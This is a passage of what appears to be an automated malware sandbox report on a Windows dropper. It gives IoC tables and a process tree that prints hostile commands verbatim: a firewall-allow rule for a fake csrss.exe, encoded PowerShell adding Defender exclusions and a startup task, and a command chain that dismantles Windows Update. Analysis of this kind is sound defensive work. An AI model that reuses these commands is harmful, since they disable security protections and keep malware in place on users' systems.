13960	reg.exe
14048	reg.exe

pid	process
13684	PING.EXE
13696	PING.EXE

description	flow	ioc
HTTP User-Agent header	195	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

File.exeSiIPgffhsWTK3JkQj3G3Dvbk.exe

pid	process
3752	File.exe
3752	File.exe
3752	File.exe
3752	File.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1968
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

CwA699rBCmpjgwId2ztJaClQ.exe

pid process

2116 CwA699rBCmpjgwId2ztJaClQ.exe

pid	process
1968

pid	process
2116	CwA699rBCmpjgwId2ztJaClQ.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SETUP_~2.EXE5aFFSxJwR1FBlcYUjSGidRlz.exe8GtwDL5uIPAGSf5Vw0_vTxoe.exeMGCBG29JHMLEMCF.exevbc.exefF5ygF6zUL2j7BgJsrzMs5uw.exepowershell.exeI56K7HK4MBG8EI8.exeH7L84LM088BFFC0.exe

description	pid	process
Token: SeDebugPrivilege	1824	SETUP_~2.EXE
Token: SeDebugPrivilege	2192	5aFFSxJwR1FBlcYUjSGidRlz.exe
Token: SeDebugPrivilege	4084	8GtwDL5uIPAGSf5Vw0_vTxoe.exe
Token: SeDebugPrivilege	75016	MGCBG29JHMLEMCF.exe
Token: SeDebugPrivilege	2732	vbc.exe
Token: SeDebugPrivilege	3880	fF5ygF6zUL2j7BgJsrzMs5uw.exe
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeDebugPrivilege	64212	powershell.exe
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeDebugPrivilege	61844	I56K7HK4MBG8EI8.exe
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeDebugPrivilege	73120	H7L84LM088BFFC0.exe
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968
Token: SeCreatePagefilePrivilege	1968
Token: SeShutdownPrivilege	1968

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

3I4KB8HIF4A6FDB.exe

pid process

86244 3I4KB8HIF4A6FDB.exe
86244 3I4KB8HIF4A6FDB.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

1968

pid	process
86244	3I4KB8HIF4A6FDB.exe
86244	3I4KB8HIF4A6FDB.exe

pid	process
1968

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

File.exeatNsZViDRuGwwYT8fGWcr69l.exep8sYABJEPBKHsrWbuUMvuEmC.exe2PBNeHhnANFcZLXvOx2BhyvE.exe

description	pid	process	target process
PID 3752 wrote to memory of 1448	3752	File.exe	SiIPgffhsWTK3JkQj3G3Dvbk.exe
PID 3752 wrote to memory of 1448	3752	File.exe	SiIPgffhsWTK3JkQj3G3Dvbk.exe
PID 3752 wrote to memory of 2208	3752	File.exe	rIATXkJQsru8Qt6FouVAoJN9.exe
PID 3752 wrote to memory of 2208	3752	File.exe	rIATXkJQsru8Qt6FouVAoJN9.exe
PID 3752 wrote to memory of 3880	3752	File.exe	fF5ygF6zUL2j7BgJsrzMs5uw.exe
PID 3752 wrote to memory of 3880	3752	File.exe	fF5ygF6zUL2j7BgJsrzMs5uw.exe
PID 3752 wrote to memory of 3880	3752	File.exe	fF5ygF6zUL2j7BgJsrzMs5uw.exe
PID 3752 wrote to memory of 2696	3752	File.exe	MOcUEk3p_UWvUgsQoStIFBET.exe
PID 3752 wrote to memory of 2696	3752	File.exe	MOcUEk3p_UWvUgsQoStIFBET.exe
PID 3752 wrote to memory of 2696	3752	File.exe	MOcUEk3p_UWvUgsQoStIFBET.exe
PID 3752 wrote to memory of 4256	3752	File.exe	FIkuzTxYq3Qh2B5p8XUzFJYh.exe
PID 3752 wrote to memory of 4256	3752	File.exe	FIkuzTxYq3Qh2B5p8XUzFJYh.exe
PID 3752 wrote to memory of 4256	3752	File.exe	FIkuzTxYq3Qh2B5p8XUzFJYh.exe
PID 3752 wrote to memory of 3488	3752	File.exe	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
PID 3752 wrote to memory of 3488	3752	File.exe	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
PID 3752 wrote to memory of 3488	3752	File.exe	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
PID 3752 wrote to memory of 2428	3752	File.exe	fJlCTLIRnExfVX1w5lhVA2gM.exe
PID 3752 wrote to memory of 2428	3752	File.exe	fJlCTLIRnExfVX1w5lhVA2gM.exe
PID 3752 wrote to memory of 2428	3752	File.exe	fJlCTLIRnExfVX1w5lhVA2gM.exe
PID 3752 wrote to memory of 4564	3752	File.exe	p8sYABJEPBKHsrWbuUMvuEmC.exe
PID 3752 wrote to memory of 4564	3752	File.exe	p8sYABJEPBKHsrWbuUMvuEmC.exe
PID 3752 wrote to memory of 4564	3752	File.exe	p8sYABJEPBKHsrWbuUMvuEmC.exe
PID 3752 wrote to memory of 2192	3752	File.exe	5aFFSxJwR1FBlcYUjSGidRlz.exe
PID 3752 wrote to memory of 2192	3752	File.exe	5aFFSxJwR1FBlcYUjSGidRlz.exe
PID 3752 wrote to memory of 2192	3752	File.exe	5aFFSxJwR1FBlcYUjSGidRlz.exe
PID 3752 wrote to memory of 4576	3752	File.exe	desuZ_fZh8gKzUyW4uNCIQWO.exe
PID 3752 wrote to memory of 4576	3752	File.exe	desuZ_fZh8gKzUyW4uNCIQWO.exe
PID 3752 wrote to memory of 4576	3752	File.exe	desuZ_fZh8gKzUyW4uNCIQWO.exe
PID 3752 wrote to memory of 3444	3752	File.exe	2PBNeHhnANFcZLXvOx2BhyvE.exe
PID 3752 wrote to memory of 3444	3752	File.exe	2PBNeHhnANFcZLXvOx2BhyvE.exe
PID 3752 wrote to memory of 3444	3752	File.exe	2PBNeHhnANFcZLXvOx2BhyvE.exe
PID 3752 wrote to memory of 5012	3752	File.exe	atNsZViDRuGwwYT8fGWcr69l.exe
PID 3752 wrote to memory of 5012	3752	File.exe	atNsZViDRuGwwYT8fGWcr69l.exe
PID 3752 wrote to memory of 4084	3752	File.exe	8GtwDL5uIPAGSf5Vw0_vTxoe.exe
PID 3752 wrote to memory of 4084	3752	File.exe	8GtwDL5uIPAGSf5Vw0_vTxoe.exe
PID 3752 wrote to memory of 4084	3752	File.exe	8GtwDL5uIPAGSf5Vw0_vTxoe.exe
PID 3752 wrote to memory of 2200	3752	File.exe	cjTIFcCkRDslD3Fg_jn_oj8q.exe
PID 3752 wrote to memory of 2200	3752	File.exe	cjTIFcCkRDslD3Fg_jn_oj8q.exe
PID 3752 wrote to memory of 2200	3752	File.exe	cjTIFcCkRDslD3Fg_jn_oj8q.exe
PID 3752 wrote to memory of 4580	3752	File.exe	ALkiWtwf2N31vVqskVzdBiTO.exe
PID 3752 wrote to memory of 4580	3752	File.exe	ALkiWtwf2N31vVqskVzdBiTO.exe
PID 3752 wrote to memory of 4580	3752	File.exe	ALkiWtwf2N31vVqskVzdBiTO.exe
PID 3752 wrote to memory of 4152	3752	File.exe	CKthxRkjQ9P0nPCB7pGm4sUU.exe
PID 3752 wrote to memory of 4152	3752	File.exe	CKthxRkjQ9P0nPCB7pGm4sUU.exe
PID 3752 wrote to memory of 4152	3752	File.exe	CKthxRkjQ9P0nPCB7pGm4sUU.exe
PID 3752 wrote to memory of 932	3752	File.exe	pKZvEDfQM4qhJ9covfP9c0w5.exe
PID 3752 wrote to memory of 932	3752	File.exe	pKZvEDfQM4qhJ9covfP9c0w5.exe
PID 3752 wrote to memory of 932	3752	File.exe	pKZvEDfQM4qhJ9covfP9c0w5.exe
PID 3752 wrote to memory of 2116	3752	File.exe	CwA699rBCmpjgwId2ztJaClQ.exe
PID 3752 wrote to memory of 2116	3752	File.exe	CwA699rBCmpjgwId2ztJaClQ.exe
PID 3752 wrote to memory of 2116	3752	File.exe	CwA699rBCmpjgwId2ztJaClQ.exe
PID 5012 wrote to memory of 1824	5012	atNsZViDRuGwwYT8fGWcr69l.exe	SETUP_~2.EXE
PID 5012 wrote to memory of 1824	5012	atNsZViDRuGwwYT8fGWcr69l.exe	SETUP_~2.EXE
PID 5012 wrote to memory of 1824	5012	atNsZViDRuGwwYT8fGWcr69l.exe	SETUP_~2.EXE
PID 4564 wrote to memory of 2732	4564	p8sYABJEPBKHsrWbuUMvuEmC.exe	vbc.exe
PID 4564 wrote to memory of 2732	4564	p8sYABJEPBKHsrWbuUMvuEmC.exe	vbc.exe
PID 4564 wrote to memory of 2732	4564	p8sYABJEPBKHsrWbuUMvuEmC.exe	vbc.exe
PID 4564 wrote to memory of 2732	4564	p8sYABJEPBKHsrWbuUMvuEmC.exe	vbc.exe
PID 4564 wrote to memory of 2732	4564	p8sYABJEPBKHsrWbuUMvuEmC.exe	vbc.exe
PID 4564 wrote to memory of 2732	4564	p8sYABJEPBKHsrWbuUMvuEmC.exe	vbc.exe
PID 4564 wrote to memory of 2732	4564	p8sYABJEPBKHsrWbuUMvuEmC.exe	vbc.exe
PID 4564 wrote to memory of 2732	4564	p8sYABJEPBKHsrWbuUMvuEmC.exe	vbc.exe
PID 3444 wrote to memory of 3472	3444	2PBNeHhnANFcZLXvOx2BhyvE.exe	2PBNeHhnANFcZLXvOx2BhyvE.exe
PID 3444 wrote to memory of 3472	3444	2PBNeHhnANFcZLXvOx2BhyvE.exe	2PBNeHhnANFcZLXvOx2BhyvE.exe

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3752
- C:\Users\Admin\Pictures\Adobe Films\SiIPgffhsWTK3JkQj3G3Dvbk.exe
  "C:\Users\Admin\Pictures\Adobe Films\SiIPgffhsWTK3JkQj3G3Dvbk.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1448
- C:\Users\Admin\Pictures\Adobe Films\FIkuzTxYq3Qh2B5p8XUzFJYh.exe
  "C:\Users\Admin\Pictures\Adobe Films\FIkuzTxYq3Qh2B5p8XUzFJYh.exe"
  2⤵
  - Executes dropped EXE
  PID:4256
- - C:\Users\Admin\Pictures\Adobe Films\FIkuzTxYq3Qh2B5p8XUzFJYh.exe
    "C:\Users\Admin\Pictures\Adobe Films\FIkuzTxYq3Qh2B5p8XUzFJYh.exe"
    3⤵
    PID:5972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:6972
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:8448
- C:\Users\Admin\Pictures\Adobe Films\fF5ygF6zUL2j7BgJsrzMs5uw.exe
  "C:\Users\Admin\Pictures\Adobe Films\fF5ygF6zUL2j7BgJsrzMs5uw.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3880
- C:\Users\Admin\Pictures\Adobe Films\rIATXkJQsru8Qt6FouVAoJN9.exe
  "C:\Users\Admin\Pictures\Adobe Films\rIATXkJQsru8Qt6FouVAoJN9.exe"
  2⤵
  - Executes dropped EXE
  PID:2208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Pictures\Adobe Films\rIATXkJQsru8Qt6FouVAoJN9.exe
    3⤵
    PID:12632
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:12892
- C:\Users\Admin\Pictures\Adobe Films\MOcUEk3p_UWvUgsQoStIFBET.exe
  "C:\Users\Admin\Pictures\Adobe Films\MOcUEk3p_UWvUgsQoStIFBET.exe"
  2⤵
  - Executes dropped EXE
  PID:2696
- C:\Users\Admin\Pictures\Adobe Films\cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
  "C:\Users\Admin\Pictures\Adobe Films\cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  PID:3488
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 452
    3⤵
    - Program crash
    PID:73100
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 764
    3⤵
    - Program crash
    PID:135284
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 772
    3⤵
    - Program crash
    PID:178212
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 800
    3⤵
    - Program crash
    PID:293176
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 788
    3⤵
    - Program crash
    PID:293568
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 908
    3⤵
    - Program crash
    PID:5000
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 916
    3⤵
    - Program crash
    PID:2312
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 1080
    3⤵
    - Program crash
    PID:4552
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 1404
    3⤵
    - Program crash
    PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe" & exit
    3⤵
    PID:5340
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe" /f
      4⤵
      Kills process with taskkill
      PID:5568
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 1436
    3⤵
    - Program crash
    PID:5528
- C:\Users\Admin\Pictures\Adobe Films\fJlCTLIRnExfVX1w5lhVA2gM.exe
  "C:\Users\Admin\Pictures\Adobe Films\fJlCTLIRnExfVX1w5lhVA2gM.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2428
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:289256
  - - C:\Users\Admin\AppData\Local\Temp\11.exe
      "C:\Users\Admin\AppData\Local\Temp\11.exe"
      4⤵
      PID:5840
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\11.exe"
        5⤵
        
        PID:6060
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbAB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGkAeQBuACMAPgA="
        6⤵
        
        PID:6592
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        6⤵
        
        PID:9820
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:10492
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:12252
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:12340
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        7⤵
        Launches sc.exe
        
        PID:12452
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        7⤵
        Launches sc.exe
        
        PID:12492
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        7⤵
        Modifies registry key
        
        PID:12600
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        7⤵
        Modifies registry key
        
        PID:12780
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        7⤵
        Modifies registry key
        
        PID:12792
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        7⤵
        Modifies registry key
        
        PID:12864
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        7⤵
        Modifies registry key
        
        PID:12932
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:12960
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:13112
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        7⤵
        Modifies registry key
        
        PID:13860
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        7⤵
        Modifies registry key
        
        PID:13960
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        7⤵
        Modifies registry key
        
        PID:14016
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        7⤵
        
        PID:14060
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        7⤵
        Modifies registry key
        
        PID:14048
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        6⤵
        
        PID:9948
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        7⤵
        
        PID:10736
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        7⤵
        
        PID:12244
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        7⤵
        
        PID:12328
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        7⤵
        
        PID:12348
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAdQBoACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEgAVQBBAGIAdwBBAGoAQQBEADQAQQBJAEEAQgBUAEEASABRAEEAWQBRAEIAeQBBAEgAUQBBAEwAUQBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEMAQQBBAEwAUQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEARgBBAEEAWQBRAEIAMABBAEcAZwBBAEkAQQBBAG4AQQBFAE0AQQBPAGcAQgBjAEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBJAEEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEgATQBBAFgAQQBCAEgAQQBHADgAQQBiAHcAQgBuAEEARwB3AEEAWgBRAEIAYwBBAEUATQBBAGEAQQBCAHkAQQBHADgAQQBiAFEAQgBsAEEARgB3AEEAZABRAEIAdwBBAEcAUQBBAFkAUQBCADAAQQBHAFUAQQBjAGcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAHQAQQBGAFkAQQBaAFEAQgB5AEEARwBJAEEASQBBAEIAUwBBAEgAVQBBAGIAZwBCAEIAQQBIAE0AQQBJAEEAQQA4AEEAQwBNAEEAZQBBAEIAcQBBAEcAUQBBAEkAdwBBACsAQQBBAD0APQAiACcAKQAgADwAIwBsAHIAbQByACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAagB1AGkAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMA